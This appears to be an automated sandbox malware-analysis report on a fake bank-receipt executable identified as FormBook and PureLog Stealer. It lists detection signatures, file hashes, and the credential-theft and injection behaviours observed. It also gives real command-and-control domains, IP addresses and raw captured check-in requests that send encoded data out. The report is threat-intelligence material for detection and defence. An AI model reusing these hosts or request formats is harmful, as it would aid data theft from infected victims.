Windows Analysis Report
Axis Bank - 67 Account Pending Bank Receipt.pdf.exe

Overview

General Information

Sample name: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe
Analysis ID: 1417513
MD5: 801edb88d052b961f74db0f5cf66e873
SHA1: 3af01b434d362c6780807db4083bcdfc67539603
SHA256: 9172e4c414e78d7439122599ea987912ab0385b4eaece0ab86c5ccc6dd138bc7
Tags: exe
Infos:

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Sigma detected: Suspicious Double Extension File Execution
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Avira: detected
Antivirus detection for URL or domain
Source: http://www.alpinalpes.com/i9if/ Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Avira: detection malicious, Label: HEUR/AGEN.1357693
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe ReversingLabs: Detection: 55%
Multi AV Scanner detection for submitted file
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Virustotal: Detection: 53% Perma Link
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe ReversingLabs: Detection: 55%
Yara detected FormBook
Source: Yara match File source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.4510906943.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.4523355689.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2177190183.00000000018A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2296111167.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2178313752.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2176518453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4521932134.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2297091636.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4521296649.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.4521828690.0000000002D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.4521230365.0000000003110000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: firefox.pdbP source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2505454273.000000000873C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000000.2097797410.00000000006EE000.00000002.00000001.01000000.0000000D.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000000.2139591971.00000000006EE000.00000002.00000001.01000000.0000000D.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000000.2269120366.00000000006EE000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: wntdll.pdbUGP source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 0000000A.00000002.2177359559.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2176924352.000000000317D000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2178908542.0000000003327000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000002.4522293458.00000000034D0000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000E.00000002.4522293458.000000000366E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000002.2297308003.000000000317E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000003.2290148261.0000000002C71000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000013.00000002.2297308003.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000003.2291974518.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: UZhG.pdb source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, OkLsTLaTTZVp.exe.0.dr
Source: Binary string: sc.pdbUGP source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 0000000A.00000002.2176817189.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000002.4516355871.0000000000579000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000003.2115638923.000000000056B000.00000004.00000020.00020000.00000000.sdmp, OkLsTLaTTZVp.exe, 00000011.00000002.2290857995.00000000016C8000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000002.4520125236.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000003.2152244914.00000000014EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 0000000A.00000002.2177359559.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, sc.exe, sc.exe, 0000000E.00000003.2176924352.000000000317D000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2178908542.0000000003327000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000002.4522293458.00000000034D0000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000E.00000002.4522293458.000000000366E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000002.2297308003.000000000317E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000003.2290148261.0000000002C71000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000013.00000002.2297308003.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000003.2291974518.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: UZhG.pdbSHA256 source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, OkLsTLaTTZVp.exe.0.dr
Source: Binary string: sc.pdb source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 0000000A.00000002.2176817189.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000002.4516355871.0000000000579000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000003.2115638923.000000000056B000.00000004.00000020.00020000.00000000.sdmp, OkLsTLaTTZVp.exe, 00000011.00000002.2290857995.00000000016C8000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000002.4520125236.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000003.2152244914.00000000014EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: firefox.pdb source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2505454273.000000000873C000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B4CD50 FindFirstFileW,FindNextFileW,FindClose, 14_2_02B4CD50
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULL Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULL Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULL Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\sc.exe Code function: 4x nop then xor eax, eax 14_2_02B3AE20
Source: C:\Windows\SysWOW64\sc.exe Code function: 4x nop then pop edi 14_2_02B42E40
Source: C:\Windows\SysWOW64\sc.exe Code function: 4x nop then pop edi 14_2_02B42E33
Source: C:\Windows\SysWOW64\sc.exe Code function: 4x nop then pop edi 14_2_02B42E19

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49709 -> 87.236.16.168:80
Source: Traffic Snort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.6:49710 -> 91.195.240.19:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49710 -> 91.195.240.19:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49711 -> 91.195.240.19:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49713 -> 91.195.240.19:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49715 -> 91.195.240.19:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49716 -> 91.195.240.19:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49718 -> 91.195.240.19:80
Performs DNS queries to domains with low reputation
Source: DNS query: www.heolty.xyz
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 91.195.240.117 91.195.240.117
Source: Joe Sandbox View IP Address: 162.0.238.43 162.0.238.43
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View ASN Name: BEGET-ASRU BEGET-ASRU
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=4gsoUDIrCS3v/pLmX0FzYlq/S9tg3Plm5/9l2IuKYjASb4q052CqcdOmJE8iC8MjVZSDSupQ0HxlPxJrF8TgdYOevqL/nRJV/kEnhqQuCD/81+sfGb0wm4esyCJYxf1MnRk3KWQ=&ptXp=h0M4i HTTP/1.1Host: www.hardtables.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=BDqqSqOapS8S5nSP+nGPXoVvWQp9N+89I0uVMcPKxM9jx1fviiEFWXWHOcelOix00UobgsDh1f2KMAIR7pbdKxVqQrde+wkrfKpy5oEwHRmU8osk850kdCSdLaNS7ZgnhT8FE9k=&ptXp=h0M4i HTTP/1.1Host: www.dreamdriss.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=kVa2H3O2nLdQmb73rGUQCTSa5yO1Oqy+XW9aR7CXLuxwYhD5xJeeQjQ7DWk6H8p6eIDbLE3lGrPhyh0N4EX52tULk7gps4R5b0g5DdizlmmCmuv7/gzR090dbHsgwZGM9O5GFw4=&ptXp=h0M4i HTTP/1.1Host: www.oyoing.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=J/ZdKhwjcPNgkYWK8nNQGDYuFg//K8kO+NHFlQuwj27ReMZgiTp2IAUG0r+FqwMro4SR/c8h2nO1f7KFQtw4eCL3eqkmNWTLTXuJn1PsKMMe1a8FV/6xhlSBIDnbFuoTU093ZOQ=&ptXp=h0M4i HTTP/1.1Host: www.jnkinteractive.co.krAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=tBbJeeN8TFUVWDWGUYWc1zgTmv//BW6sGk5FaBPSs7ff6PU8aSBgHOOVkPyYWJzaSKff1c5UP3PXUEl6PWBMF6f8kK5BWQaUc8YsckKjWRSS0+nF7qFX4xF4ru5xnlmS00lMOtY=&ptXp=h0M4i HTTP/1.1Host: www.heolty.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=Dg00GhQGstkyJZjd5CE3hNrIGIiJHx2zN+hZPwBWgO6ArtvWdTZcS41+U+aQVX8Mn9mWC51pa9o2mnVFzVEeabclG+WnZVxFmsHbFWslihDwTcFNVreDef/+ZXwtHd7qhP3rcUE=&ptXp=h0M4i HTTP/1.1Host: www.ozenmoda.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=WQpp1M9K+rFf1OJm2Ljtb+HXO8heWr8a6bB0Z406amzooojk56n3Gspyyb6jLpNfB02glOZDiPlWwlPqPv0mIfZar29Xpk/b8KkhqVKtP5PW2fQt3WhQrw9GSFUE/IF33/cA9Sk=&ptXp=h0M4i HTTP/1.1Host: www.alpinalpes.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=2XzH5iugp7ou8zoIweaD7kyiWHpRtbSvJxe6v6OJSMzwSGn6nVojik46NgFcZxewVOPus5v63d+DY/7m6aKSklAPkcM0O+ZyRAegSuk/msfMig5p6q7k0NKIqkLUO2tA3cSxR8M=&ptXp=h0M4i HTTP/1.1Host: www.ojaitangerines.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=dvO8lz70xLwt5avcw4AAeWGZEYZWTneANh91Pw0cCa6dsDVfzCPRDy/oyS5avRt8TYifOgtb3lE5UqI+p4e+HJBhrVVijgweUYOzPYOn4yXUVaDe/viJO0CpGneTXVZl3KCNzhg=&ptXp=h0M4i HTTP/1.1Host: www.gamesun.websiteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=A4KKzbBh2ZdQ7PcRTv19C8wiwe7RM/6RzfhR1JmRv8NY4gb2dUzMEyBbjBPscMMCqyAXljvwXqvOvlEmZLaTaxt0lnzAbe9OujlVsGnlz4p0yKEfaQv6TyjEUL3A57LMa+tcIMg=&ptXp=h0M4i HTTP/1.1Host: www.lucathicke.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=81GtAbRv1CE0GPwuuDtMviXCZZV8X24rY9pL2EzPgW9OSIkdmi0ohJeo+nfdQPV8B0BQbyt87mHG/MblzJN+gJy40ipZdzYxx8mGTkl2DCOZDDwf28/27ZCuSZ1i1cDQR3nCO54=&ptXp=h0M4i HTTP/1.1Host: www.brandprome.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=1hkwI/tMPxR4ZKMYtd4398ZYWD6ZJ3wRevAaJu7+X8hJQtTD81NNLhos/UU0hekOE22X3SYl7LAwJkDzOfiOIvlSi/BXzemdxYRKrbMbl8xHtP02JHRVmlWvlmRlAOo5ceCvuaE=&ptXp=h0M4i HTTP/1.1Host: www.cr-pos.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=07tNKNHdTyhqX0xvzZZ+UT55dExqloc4SEArb/JcF37tWOUGxFSR+0+PgY6gc4vskevIRJoD8o+ONktbCT1c+AXrrou4goyYI3fp7HEXPuCUAV8/yJTZIaw5rzprO8qvcK+ybZo=&ptXp=h0M4i HTTP/1.1Host: www.rprostranstvo.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=sy7lPI633m8TvfzFs0ynAvEw3up5Jg2A2dr8TRvjlNa5wVoJ5pVvpgUy1CFIKjm0dKFO/4JK3CY3m76wlp6MJfLsTPWvWPpVGMDnppjD4tav3P005f5VBIWCEn6p7MVcDGbm8L8=&ptXp=h0M4i HTTP/1.1Host: www.ruplome.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: unknown DNS traffic detected: queries for: www.hardtables.store
Source: unknown HTTP traffic detected: POST /i9if/ HTTP/1.1Host: www.dreamdriss.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Connection: closeContent-Length: 210Origin: http://www.dreamdriss.lolReferer: http://www.dreamdriss.lol/i9if/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10Data Raw: 5f 6a 65 50 76 3d 4d 42 43 4b 52 63 36 78 6d 31 6c 44 6e 48 57 49 32 41 69 43 54 34 78 62 59 48 4a 38 43 38 6b 32 45 45 71 34 4d 4b 48 49 2b 34 70 4f 75 55 4b 4b 38 6d 52 64 5a 45 32 52 57 59 66 54 50 51 6c 76 69 46 6f 4c 6d 65 4c 53 6a 4b 71 39 64 53 59 58 35 71 50 2b 64 53 31 71 55 70 46 79 77 58 59 75 46 4a 5a 55 76 75 41 54 50 6a 47 62 39 66 67 43 38 71 30 59 54 68 75 39 54 76 52 47 73 2f 49 2f 71 42 51 4d 42 37 50 6b 67 59 6a 70 59 51 33 53 65 44 47 6f 33 4e 68 49 4f 4e 54 6a 46 72 37 6f 71 71 78 2b 2b 34 71 55 53 7a 61 56 6f 6b 68 48 46 2b 58 61 58 50 34 34 70 6c 4f 62 32 30 54 52 46 39 38 41 61 36 6e 43 65 2b 2b 53 Data Ascii: _jePv=MBCKRc6xm1lDnHWI2AiCT4xbYHJ8C8k2EEq4MKHI+4pOuUKK8mRdZE2RWYfTPQlviFoLmeLSjKq9dSYX5qP+dS1qUpFywXYuFJZUvuATPjGb9fgC8q0YThu9TvRGs/I/qBQMB7PkgYjpYQ3SeDGo3NhIONTjFr7oqqx++4qUSzaVokhHF+XaXP44plOb20TRF98Aa6nCe++S
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Fri, 29 Mar 2024 13:23:28 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 280Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 68 61 72 64 74 61 62 6c 65 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.hardtables.store Port 80</address></body></html>
